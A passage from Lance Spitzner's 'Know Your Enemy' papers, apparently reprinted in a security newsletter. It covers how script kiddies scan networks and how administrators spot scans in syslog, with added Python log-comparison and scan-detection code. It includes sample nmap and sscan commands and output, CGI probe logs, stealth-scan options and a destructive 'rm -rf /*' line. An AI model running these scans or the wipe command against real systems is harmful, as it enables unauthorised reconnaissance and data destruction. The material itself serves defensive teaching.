      reachable). Once this database of IP addresses is built, the user 
      would want to determine which systems were running Linux. Many scanners 
      today, such as Fyodor's nmap, can easily determine this by sending bad 
      packets to a system and seeing how it responds. Then, tools would be used 
      to determine which Linux systems were running imap. All that is left now 
      is to exploit those vulnerable systems. 

      You would think that all this scanning would be extremely noisy, 
      attracting a great deal of attention. However, many people are not 
      monitoring their systems, and do not realize they are being scanned. Also, 
      many script kiddies quietly look for a single system they can 
      exploit. Once they have exploited a system, they use this system as a 
      launching pad. They can boldly scan the entire Internet without fear of 
      retribution. If their scans are detected, the system admin and not the 
      black-hat will be held liable. 

      Also, these scan results are often archived or shared among other users, 
      then used at a later date.  For example, a user develops a database of 
      what ports are open on reachable Linux systems.  The user built this 
      database to exploit the current imap vulnerability.  However, let's 
      say that a month from now a new Linux exploit is identified on a different 
      port.  Instead of having to build a new database (which is the most time 
      consuming part), the user can quickly review his archived database and 
      compromise the vulnerable systems.  As an alternative, script kiddies 
      share or even buy databases of vulnerable systems from each other.  You 
      can see examples of this in Know Your Enemy: Motives.  The script kiddie 
      can then exploit your system without even scanning it.  Just because your 
      systems have not been scanned recently does not mean you are secure. 

      The more sophisticated black-hats implement trojans and backdoors once 
      they compromise a system. Backdoors allow easy and unnoticed access to the 
      system whenever the user wants. The trojans make the intruder 
      undetectable. He would not show up in any of the logs, system 
      processes, or file structure. He builds a comfortable and safe home where 
      he can blatantly scan the Internet.  For more information on this, check 
      out Know Your Enemy: III. 

      These attacks are not limited to a certain time of the day. Many admins 
      search their log entries for probes that happen late at night, believing 
      this is when black-hats attack. Script kiddies attack at any time. As they 
      are scanning 24hrs a day, you have no idea when the probe will 
      happen. Also, these attacks are launched throughout the world. Just as the 
      Internet knows no geographical bounds, it knows no time zones. It may be 
      midnight where the black-hat is, but it is 1pm for you. 

      This methodology of scanning for vulnerable systems can be used for a 
      variety of purposes.  Recently, new Denial of Service attacks have been 
      reported, specifically DDoS (Distributed Denial of Service) attacks.  
      These attacks are based on a single user controlling hundreds, if 
      not thousands, of compromised systems throughout the world.  These 
      compromised systems are then remotely coordinated to execute Denial of 
      Service attacks against a victim or victims.  Since multiple compromised 
      systems are used, it is extremely difficult to defend against and 
      identify the source of the attack.  To gain control of so many systems, 
      script kiddie tactics are often employed.  Vulnerable systems are randomly 
      identified and then compromised to be used as DDoS launching pads.  The 
      more systems compromised, the more powerful the DDoS attack.  One example 
      of such an attack is 'stacheldraht'.  To learn more about Distributed 
      Denial of Service attacks and how to protect yourself, check out Paul 
      Ferguson's site Denialinfo. 

      The Tools 

      The tools used are extremely simple to use. Most are limited to a single 
      purpose with few options. First come the tools used to build an IP 
      database. These tools are truly random, as they indiscriminately scan the 
      Internet. For example, one tool has a single option: A, B, or C. The 
      letter you select determines the size of the network to be scanned. The 
      tool then randomly selects which IP network to scan. Another tool uses a 
      domain name (z0ne is an excellent example of this). The tool builds an IP 
      database by conducting zone transfers of the domain name and all 
      sub-domains. Users have built databases with over 2 million IPs by 
      scanning the entire .com or .edu domain. Once discovered, the IPs are then 
      scanned by tools to determine vulnerabilities, such as the version of 
      named, operating system, or services running on the system. Once the 
      vulnerable systems have been identified, the black-hat strikes. For a 
      better understanding of how these tools are used, check out Know Your 
      Enemy: Forensics. 

      How to Protect Against This Threat 

      There are steps you can take to protect yourself against this threat. 
      First, the script kiddie is going for the easy kill; they are looking for 
      common exploits. Make sure your systems and networks are not vulnerable to 
      these exploits. Both www.cert.org and www.ciac.org are excellent 
      sources on what a common exploit is. Also, the listserv bugtraq (archived 
      at securityfocus.com) is one of the best sources of information. Another 
      way to protect yourself is to run only the services you need. If you do 
      not need a service, turn it off. If you do need a service, make sure it is 
      the latest version.  For examples on how to do this, check out Armoring 
      Solaris, Armoring Linux or Armoring NT. 

      As you learned from the tools section, DNS servers are often used to 
      develop a database of systems that can be probed. Limit the systems that 
      can conduct zone transfers from your Name Servers. Log any unauthorized 
      zone transfers and follow up on them. I highly recommend upgrading 
      to the latest version of BIND (software used for Domain Name Service), 
      which you can find at www.isc.org/bind.html. Last, watch for your systems 
      being probed. Once identified, you can track these probes and gain a 
      better understanding of the threats to your network and react to these 
      threats. 

      Conclusion 

      The script kiddie poses a threat to all systems. They show no bias and 
      scan all systems, regardless of location and value. Sooner or later, your 
      system will be probed. By understanding their motives and methods, you can 
      better protect your systems against this threat. 
      @HWA

303.0 [IND] Paper: Know your enemy #2 by Lance Spitzner
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Tracking their moves 
      Know Your Enemy: II 

      Lance Spitzner 
      http://www.enteract.com/~lspitz/papers.html 
      Last Modified: July 7, 2000 

      This article is the second of a three part series. In the first article, 
      Know Your Enemy, we covered the tools and methodologies of the Script 
      Kiddie, specifically how they probe for vulnerabilities and then 
      attack.  The third paper covers what script kiddies do once they 
      gain root, specifically how they cover their tracks and what they do 
      next.  This, the second paper, will cover how to track their movements.  
      Just as in the military, you want to track the bad guys and know what they 
      are doing.  We will cover what you can, and cannot, determine with your 
      system logs.  You may be able to determine if you are being probed, what 
      you were being probed for, what tools were used, and if they were 
      successful.  The examples provided here focus on Linux, but can apply to 
      almost any flavor of Unix.  Keep in mind, there is no guaranteed way to 
      track the enemy's every step.  However, this article is a good place to 
      start. 

      Securing Your Logs 

      This article is not on Intrusion Detection; there are a variety of 
      excellent sources that cover IDS.  If you are interested in intrusion 
      detection, I recommend checking out applications such as Network Flight 
      Recorder or snort.  This article focuses on intelligence gathering, 
      specifically how to figure out what the enemy is doing by reviewing your 
      system logs.  You will be surprised how much information you will find in 
      your own log files.  However, before we can talk about reviewing your 
      logs, we first have to discuss securing your system logs.  Your log files 
      are worthless if you cannot trust the integrity of them.  The first thing 
      most black-hats do is alter log files on a compromised system.  There are 
      a variety of rootkits that will wipe out their presence from log files 
      (such as cloak), or alter logging altogether (such as trojaned syslogd 
      binaries).  So, the first step to reviewing your logs is securing your 
      logs. 

      This means you will need to use a remote log server.  Regardless of how 
      secure your system is, you cannot trust your logs on a compromised system.  
      If nothing else, the black-hat can simply do a rm -rf /* on your system, 
      wiping your hard drive clean.  This makes recovering your logs 
      somewhat difficult.  To protect against this, you will want all your 
      systems to log traffic both locally and to a remote log server.  I 
      recommend making your log server a dedicated system, i.e. the only thing 
      it should be doing is collecting logs from other systems.  If money is an 
      issue, you can easily build a Linux box to act as your log server.  This 
      server should be highly secured, with all services shut off, allowing only 
      console access (see Armoring Linux for an example).  Also, ensure that 
      port 514 UDP is blocked or firewalled at your Internet connection.  This 
      protects your log server from receiving bad or unauthorized logging 
      information from the Internet. 

      For those of you who like to get sneaky, something I like to do is 
      recompile syslogd to read a different configuration file, such as 
      /var/tmp/.conf.  This way the black-hat does not realize where the real 
      configuration file is.  This is simply done by changing the entry 
      "/etc/syslog.conf" in the source code to whatever file you want.  We then 
      set up our new configuration file to log both locally and to the remote 
      log server (see example).  Make sure you maintain a standard copy of the 
      configuration file, /etc/syslog.conf, which points to all local logging.  
      Even though this configuration file is now useless, this will throw off 
      the black-hat from realizing the true destination of our remote logging.  
      Another option for your systems is to use a secure method of logging.  One 
      way is to replace your syslogd binary with something that has integrity 
      checking and a greater breadth of options, such as syslog-ng, which 
      you can find at http://www.balabit.hu/products/syslog-ng.html 

      
      Most of the logs we will use are the ones stored on the remote log server.  
      As mentioned earlier, we can be fairly confident of the integrity of these 
      logs since they are on a remote and secured system.  Also, since all 
      systems are logging to a single source, it is much easier to identify 
      patterns in these logs.  We can quickly review what's happening to all the 
      systems in one source.  The only time you would want to review logs stored 
      locally on a system is to compare them to what the log server has.   You 
      can determine if the local logs have been altered by comparing them to the 
      remote logs. 
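
      The local-versus-log-server comparison described above, as an added
      example that is not part of Spitzner's paper. The log contents, the
      function names and the 10.1.1.5 address are constructed for this example;
      it assumes both copies use the standard syslog line layout.

```python
import re
from collections import Counter

# Constructed sample: what the log server holds (entries from two hosts) ...
REMOTE_LOG = """\
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200
Apr 14 19:19:02 bach in.ftpd[2210]: connect from 192.168.11.200
Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root
Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed
Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed
Apr 14 22:10:41 mozart in.telnetd[11702]: connect from 10.1.1.5
"""
# ... and what mozart's own log files contain after someone edited them.
LOCAL_LOG = """\
Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed
Apr 14 22:10:41 mozart in.telnetd[11702]: connect from 10.1.1.5
Apr 14 22:15:00 mozart in.telnetd[11710]: connect from 10.1.1.5
"""

SYSLOG_RE = re.compile(
    r"^\s*(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+"
    r"(?P<host>\S+)\s+(?P<msg>.*\S)\s*$"
)
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def entries(text, host):
    """(timestamp, host, message) tuples for syslog lines written by `host`."""
    out = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if m and m["host"] == host:
            # syslog pads single-digit days ("Apr  4"); collapse the padding
            out.append((" ".join(m["ts"].split()), m["host"], m["msg"]))
    return out


def unmatched(a, b):
    """Entries of `a` with no one-for-one partner in `b`, in the order of `a`.

    A Counter is used so that two identical lines in the same second are not
    treated as one.
    """
    budget = Counter(b)
    out = []
    for item in a:
        if budget[item] > 0:
            budget[item] -= 1
        else:
            out.append(item)
    return out


def compare_logs(local_text, remote_text, host):
    """Return (missing_locally, only_local) for one host.

    missing_locally: the log server has the entry, the host no longer does.
    only_local: the host has it, the server does not. syslog over UDP can
    drop datagrams, so this list is weaker evidence than the first one.
    """
    local, remote = entries(local_text, host), entries(remote_text, host)
    return unmatched(remote, local), unmatched(local, remote)


def addresses_in(entry_list):
    """Count the IPv4 addresses mentioned in a list of entries."""
    counts = Counter(
        ip for _, _, msg in entry_list for ip in IPV4_RE.findall(msg)
    )
    return counts.most_common()


if __name__ == "__main__":
    missing, extra = compare_logs(LOCAL_LOG, REMOTE_LOG, "mozart")
    print(f"{len(missing)} entries on the log server are gone from mozart:")
    for ts, host, msg in missing:
        print(f"  {ts} {host} {msg}")
    print("addresses named in the removed entries:", addresses_in(missing))
    print(f"{len(extra)} entries exist only on mozart")
```

      The addresses that appear in the removed entries show what the editing
      was meant to hide.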

      Pattern Matching 

      By looking at your log entries, you can usually determine if you are 
      being port scanned.  Most Script Kiddies scan a network for a single 
      vulnerability.  If your logs show most of your systems being connected 
      to from the same remote system, on the same port, this is most likely an 
      exploit scan.  Basically, the enemy has an exploit for a single 
      vulnerability, and they are scanning your network for it.  When they find 
      it, they exploit it.  For most Linux systems, TCP Wrappers is installed by 
      default.  So, we would find most of these connections in 
      /var/log/secure.  For other flavors of Unix, we can log all inetd 
      connections by launching inetd with the "-t" flag, facility daemon.  A 
      typical exploit scan would look something like the one below.  Here we 
      have a source scanning for the wu-ftpd vulnerability. 

      /var/log/secure 
      Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200 
      Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200 
      Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200 
      Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200 
      Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200 

      Here we see the source 192.168.11.200 scanning our network.  Notice how 
      the source sequentially scans each IP (this is not always the case).  This 
      is the advantage of having a log server: you can more easily identify 
      patterns in your network since all the logs are combined.  The repeated 
      connections to port 21, ftp, indicate they were most likely looking for 
      the wu-ftpd exploit.  We have just determined what the black-hat is 
      looking for.  Often, scans tend to come in phases.  Someone will release 
      code for an imap exploit, and you will suddenly see a rush of imap scans 
      in your logs.  The next month you will be hit by ftp.  
      http://www.cert.org/advisories/ is an excellent source for current 
      exploits.  Sometimes, tools will scan for a variety of exploits at the 
      same time, so you may see a single source connecting to several ports. 
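
      The two patterns described above (one source touching the same service on
      many hosts, and one source touching several services on one host), as an
      added example that is not part of Spitzner's paper. It assumes the TCP
      Wrappers "connect from" format of the /var/log/secure excerpts; the
      thresholds, time windows, function names and the two 10.1.1.5 entries are
      assumptions made for this example.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts host service src")

# Sample input: "connect from" lines in the format of the /var/log/secure
# excerpts in this article, plus two constructed entries from 10.1.1.5 that
# stand in for ordinary traffic.
SAMPLE_LOG = """\
Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200
Apr 10 14:02:10 bach in.telnetd[7001]: connect from 10.1.1.5
Apr 10 18:30:00 bach in.ftpd[7050]: connect from 10.1.1.5
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200
Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200
Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200
"""

LINE_RE = re.compile(
    r"^\s*(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})\s+(?P<host>\S+)\s+"
    r"(?P<svc>[\w.-]+)\[\d+\]:\s+connect from\s+(?P<src>\S+)\s*$"
)


def parse_secure(text, year=1999):
    """Return Events for TCP Wrappers 'connect from' lines; skip anything else."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so the caller supplies one
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append(Event(ts, m["host"], m["svc"], m["src"]))
    return events


def _densest(events, group_key, counted, window):
    """Per group, the largest set of distinct `counted` values that falls
    inside any time span no longer than `window`."""
    groups = defaultdict(list)
    for e in events:
        groups[group_key(e)].append(e)
    best = {}
    for key, evs in groups.items():
        evs.sort(key=lambda e: e.ts)
        left, top = 0, set()
        for right, e in enumerate(evs):
            while e.ts - evs[left].ts > window:
                left += 1
            seen = {counted(x) for x in evs[left:right + 1]}
            if len(seen) > len(top):
                top = seen
        best[key] = top
    return best


def find_sweeps(events, min_hosts=3, window=timedelta(minutes=10)):
    """One source, same service, many hosts: a scan for a single exploit."""
    hits = _densest(events, lambda e: (e.src, e.service), lambda e: e.host, window)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_hosts}


def find_multi_service(events, min_services=3, window=timedelta(seconds=30)):
    """One source, one host, many services: a tool probing several exploits."""
    hits = _densest(events, lambda e: (e.src, e.host), lambda e: e.service, window)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_services}


if __name__ == "__main__":
    events = parse_secure(SAMPLE_LOG)
    for (src, svc), hosts in find_sweeps(events).items():
        print(f"{src} swept {svc} across {len(hosts)} hosts: {', '.join(hosts)}")
    for (src, host), svcs in find_multi_service(events).items():
        print(f"{src} probed {len(svcs)} services on {host}: {', '.join(svcs)}")
```

      Run against the combined file on the log server, not per-host logs, since
      the sweep is only visible when entries from all hosts sit side by side.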

      Keep in mind, if you are not logging the service, you will not know if you 
      are scanned for it.  For example, most rpc connections are not logged.  
      However, many services can simply be added to /etc/inetd.conf for logging 
      with TCP Wrappers.  For example, you can add an entry in 
      /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and 
      log the connections (see Intrusion Detection for more info on this). 

      What's the Tool? 

      Sometimes you can actually determine the tools being used to scan your 
      network.  Some of the more basic tools scan for a specific exploit, such 
      as ftp-scan.c.  If only a single port or vulnerability is being probed on 
      your network, they are most likely using one of these "single mission" 
      tools.  However, there exist tools that probe for a variety of 
      vulnerabilities or weaknesses; two very popular tools are sscan by jsbach 
      and nmap by Fyodor.  I've selected these two tools because they represent 
      the two "categories" of scanning tools.  I highly recommend you run these 
      tools against your own network; you may be surprised by the results :) 

      NOTE: The tool sscan is now over a year old and severely out of date.  
      sscan is discussed only as an example.  For scanning your own network for 
      vulnerabilities, I highly recommend the tool Nessus. 

     sscan represents the "all purpose" Script Kiddie scanning tool. It probes a 
     network for a set of specific vulnerabilities. It is customizable, allowing 
     you to add probes for new exploits.  You just give the tool a network and 
     network mask, and it does the rest for you.  However, the user must be root 
     to use it.  The output is extremely easy to interpret (hence making it so 
     popular):  It gives a concise summary of many vulnerable services.  All you 
     have to do is run sscan against a network, grep for the word "VULN" in the 
     output, and then run the "exploit du jour".  Below is an example of sscan 
     run against the system mozart (172.17.6.30). 

          otto #./sscan -o 172.17.6.30 

          --------------------------<[ * report for host mozart * 
          <[ tcp port: 80 (http) ]>       <[ tcp port: 23 (telnet) ]> 
          <[ tcp port: 143 (imap) ]>      <[ tcp port: 110 (pop-3) ]> 
          <[ tcp port: 111 (sunrpc) ]>    <[ tcp port: 79 (finger) ]> 
          <[ tcp port: 53 (domain) ]>     <[ tcp port: 25 (smtp) ]> 
          <[ tcp port: 21 (ftp) ]> 
          --<[ *OS*: mozart: os detected: redhat linux 5.1 
          mozart: VULN: linux box vulnerable to named overflow. 
          -<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request. 
          -<[ *FINGER*: mozart: root: account exists. 
          --<[ *VULN*: mozart: sendmail will 'expn' accounts for us 
          --<[ *VULN*: mozart: linux bind/iquery remote buffer overflow 
          --<[ *VULN*: mozart: linux mountd remote buffer overflow 
          ---------------------------<[ * scan of mozart completed *

     Nmap represents the "raw data" tool set.  It doesn't tell you what 
     vulnerabilities exist; rather, it tells you what ports are open, and you 
     determine the security impact.  Nmap has quickly become the port scanner of 
     choice, and with good reason.  It takes the best of a variety of port 
     scanners and puts all their functionality into a single tool, including OS 
     detection, various packet assembly options, both UDP and TCP scanning, 
     randomization, etc.  However, you need networking skills to use the tool 
     and interpret the data.  Below is an example of nmap run against the same 
     system. 

          otto #nmap -sS -O 172.17.6.30 

          Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) 
          Interesting ports on mozart (172.17.6.30): 
          Port    State       Protocol  Service 
          21      open        tcp        ftp 
          23      open        tcp        telnet 
          25      open        tcp        smtp 
          37      open        tcp        time 
          53      open        tcp        domain 
          70      open        tcp        gopher 
          79      open        tcp        finger 
          80      open        tcp        http 
          109     open        tcp        pop-2 
          110     open        tcp        pop-3 
          111     open        tcp        sunrpc 
          143     open        tcp        imap2 
          513     open        tcp        login 
          514     open        tcp        shell 
          635     open        tcp        unknown 
          2049    open        tcp        nfs 

          TCP Sequence Prediction: Class=truly random 
                                   Difficulty=9999999 (Good luck!) 
          Remote operating system guess: Linux 2.0.35-36 

          Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

      By reviewing your logs, you can determine which of these tools were used
      against you.  To do this, you have to understand how the tools work.  
      First, an sscan will be logged as follows (this is a default scan with no
      modifications to any config files): 

      /var/log/secure 
      Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200 
      Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200 
      Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200 
      Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200 
      Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200 
      Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200 
      
      /var/log/maillog 
      Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while
                                 reading line user=??? host=[192.168.11.200] 
      Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while 
                                 reading line user=??? host=[192.168.11.200] 
      Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root 
      
      /var/log/messages 
      Apr 14 21:03:09 mozart telnetd[11682]: ttloop:  peer died: Invalid or 
                                     incomplete multibyte or wide character 
      Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed 
      
      sscan also scans for cgi-bin vulnerabilities.  These probes will not be
      logged by syslogd; you will find them in access_log.  I decided to include
      them anyway for your edification :) 
      
      /var/log/httpd/access_log 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 168 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 168 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 168 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 172 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 172 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 170 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/htmlscript HTTP/1.0" 404 171 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 174 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/perl.exe HTTP/1.0" 404 169 
      192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 172 
      192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.0" 404 187 
      192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/jj HTTP/1.0" 404 163 
      
      Notice how a complete connection was made for all the ports (SYN, SYN-ACK, 
      ACK)  then torn down.  That is because sscan is determining at the 
      application layer what is going on.  Not only does sscan want to know if 
      your ftp port is open, but what ftp daemon is running.  The same can be 
      said for imap, pop, etc.  This can be seen in sniff traces using sniffit, 
      a tool commonly used to sniff passwords. 

      mozart $ cat 172.17.6.30.21-192.168.11.200.7238
      220 mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue Jun 9 10:43:14 EDT 1998) ready.

      As you see above, a complete connection was made to determine the version 
      of wu-ftpd that was running.  When you see the complete connections in 
      your logs, as shown above, you are most likely being scanned by an 
      exploit tool.  These tools are making a complete connection to 
      determine what you are running. 

      Nmap, like most port scanners, does not care what you are running, only
      whether you are running specific services.  For this, nmap has a powerful
      set of options, letting you determine what kind of connection to make,
      including SYN, FIN, Xmas, Null, etc.  For a detailed description of these
      options, check out http://www.insecure.org/nmap/nmap_doc.html.  Because
      of these options, your logs will be different based on the options
      selected by the remote user.  A connection made with the -sT flag is a
      complete connection, so the logs will look similar to sscan; however, by
      default nmap scans more ports.
      
      /var/log/secure 
      Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200 
      Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No such file or directory 
      Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200 
      Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200 
      Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200 
      Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200 
      Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200 
      
      One thing to keep in mind is the -D (or decoy) option.  This nmap option 
      allows the user to spoof the source address.  You may see scans from 15 
      different sources at the same time, but only one of them is the real one.  
      It is extremely difficult to determine which of the 15 was the actual 
      source.  More often, users will select the -sS flag for port scanning.  
      This is a stealthier option, as only a SYN packet is sent.   If the remote 
      system responds, the connection is immediately torn down with a RST.  The 
      logs from such a scan look as follows (NOTE: Only the first five entries 
      are included here). 
      
      /var/log/secure 
      Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown 
      Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown 
      Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:09 mozart imapd[11719]: connect from unknown 
      Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown 
      Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can't get client address: Connection reset by peer 
      Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown 
        
      
      Notice all the errors in the connections.  Since the SYN-ACK sequence is 
      torn down before a complete connection can be made, the daemon cannot 
      determine the source system.  The logs show that you have been scanned;
      unfortunately, you do not know by whom.  What is even more alarming is, on 
      most other systems (including newer kernels of Linux), none of these 
      errors would have been logged.  To quote Fyodor " ... based on all the 
      'connection reset by peer' messages.  This is a Linux 2.0.XX oddity -- 
      virtually every other system (including the 2.2 and later 2.1 kernels) 
      will show nothing.  That bug (accept() returning before completion of the 
      3-way handshake) was fixed." 

      Nmap includes other stealth options, such as -sF, -sX, -sN, where various 
      flags are used.  This is what the logs look like for these scans:
      
      /var/log/secure 
        
      
      Notice something here, no logs!  Scary huh, you just got scanned and 
      didn't even know it.  All three types of scans determined the same 
      results, however you are able to fully log only the first type, -sT (full 
      connection).  To detect these stealth scans, you will need to use a 
      different logging application such as tcplogd or ippl.  Some commercial 
      Firewalls will also detect and log all of these scans (I have confirmed 
      this on Checkpoint Firewall 1). 
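
      The log signatures described above can be checked mechanically.  The
      following added example (not part of the original paper) groups the
      "connect from" lines by source and flags bursts that touch many
      services within a few seconds, separating full-connect scans from the
      half-open pattern a Linux 2.0.x host logs.  The thresholds, the function
      names and the two 10.0.0.5 lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Lines copied from the /var/log/secure excerpts above, plus two constructed
# benign entries from 10.0.0.5 for contrast.
SAMPLE_SECURE = """\
Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200
Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200
Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown
Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart imapd[11719]: connect from unknown
Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown
Apr 14 22:10:00 mozart in.telnetd[11800]: connect from 10.0.0.5
Apr 14 22:40:00 mozart in.ftpd[11810]: connect from 10.0.0.5
"""

LINE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ ([\w.\-]+)\[(\d+)\]: (.*)$")
RESET = "can't get client address: Connection reset by peer"


def parse(text, year=1999):
    """Return (time, daemon, pid, message) tuples; syslog omits the year."""
    events = []
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if m:
            when = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            events.append((when, m.group(2), int(m.group(3)), m.group(4)))
    return events


def find_scans(events, window=10, min_services=4):
    """Flag sources that touch >= min_services daemons within `window` seconds."""
    # A daemon instance that logged the reset warning never saw a completed
    # handshake, so its "connect from unknown" marks a half-open (-sS) probe.
    reset_pids = {(d, pid) for _, d, pid, msg in events if RESET in msg}
    hits = defaultdict(list)
    for when, daemon, pid, msg in events:
        m = re.match(r"connect from (\S+)", msg)
        if not m:
            continue
        src = m.group(1)
        half_open = src == "unknown" and (daemon, pid) in reset_pids
        hits[(src, "half-open" if half_open else "full-connect")].append((when, daemon))

    findings = []
    for (src, kind), seen in hits.items():
        seen.sort()
        start, best = 0, None
        for end in range(len(seen)):
            # Slide the window so it never spans more than `window` seconds.
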